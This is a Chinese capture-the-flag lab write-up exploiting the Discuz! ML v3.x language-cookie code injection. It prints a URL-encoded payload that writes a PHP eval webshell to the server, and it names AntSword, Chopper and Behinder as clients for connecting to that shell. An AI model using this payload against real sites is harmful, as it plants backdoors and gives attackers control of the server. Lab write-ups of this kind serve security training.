资讯专栏INFORMATION COLUMN

靶场测试--安鸾渗透实战平台

Guakin_Huang / 1353人阅读

摘要:我们可以使用函数写入一句话木马经过编码后为可以使用或者进行连接,这里使用的是发现,实验结束总结以上就是今天实验的内容,本文简单介绍了系列存在代码注入漏洞,仅供参考

CMS系列-Discuz

题目URL:http://whalwl.host:8042/forum.php(tips:flag在网站根目录下)


前言

漏洞描述
Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。

漏洞影响版本:Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
(注意:支持多语言切换可能会有这个漏洞!)


提示:以下是本篇文章正文内容,下面案例可供参考

一、利用Burp进行抓取数据包

二、将数据包发送到Repeater

1.构造请求参数验证漏洞是否存在

2.利用Cookie信息上传Shell

因为cookie字段中language没有对参数进行过滤直接拼接从而写入缓存文件之中,导致缓存文件随后被加载,从而造成代码执行。我们可以使用file_put_contents() 函数写入一句话木马
‘.file_put_contents(‘owl.php’,urldecode(’’)).’
经过URL编码后为
%27.file_put_contents%28%27owl.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522owl%2522%255d%29%253b%253f%253e%27%29%29.%27

3.可以使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword

发现flag,实验结束

总结

以上就是今天实验的内容,本文简单介绍了CMS系列Discuz ML! V3.X存在代码注入漏洞,仅供参考!!!

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/119925.html

相关文章

  • 基于3个操作系统的靶场,从零开始做安全渗透工程师

    摘要:前言基于个操作系统的靶场提供镜像,讲解从只有一一个到最终拿下机器权限的全流程。用的是黑客惯用的破坏攻击的方法,行的却是维护安全之事。因此国家给白帽黑客赋予一个专业名称安全渗透工程师。 ...

    xiaokai 评论0 收藏0
  • 渗透测试|网络安全常用靶场

    摘要:搭建教程网络上随便一搜一大堆,这里就不再阐述免费开源漏洞靶场操作系统漏洞综合靶场注入靶场文件上传漏洞靶场 搭建教程网络上随便一搜一大堆,这里就不再阐述 vulhu...

    Dionysus_go 评论0 收藏0
  • CTF学习经验分享(Web方向)

    摘要:也是朋友推荐的题目分类比较清晰在技能树那挨个点进去可以循序渐进的学习很适合初学而且查找近期赛程特别方便赛程表清晰明了。我们学校完全没有学习的环境与资源更没有战队哎总之先一起加油吧         本人Web安全初学者,记录分享一下学习历程,推荐评价仅代表个人观点&...

    番茄西红柿 评论0 收藏2637
  • Vulnhub靶场渗透-Breach1.0

    摘要:简介是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞需要使用或运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的权限和查看靶机信息是一个难度初级到中级的挑战静态,配置环境到同一个网 ...

    lvzishen 评论0 收藏0
  • 内网域渗透分析(实战总结)

    摘要:搭建代理添加一个代理建立了一条由攻击机到服务器的通道,的服务端在攻击机,也是反向代理复制代理链接到中让所有模块的流量都通过此代理走。全局设置允许反向代理,通过反弹,建立双向通道。 ...

    FuisonDesign 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<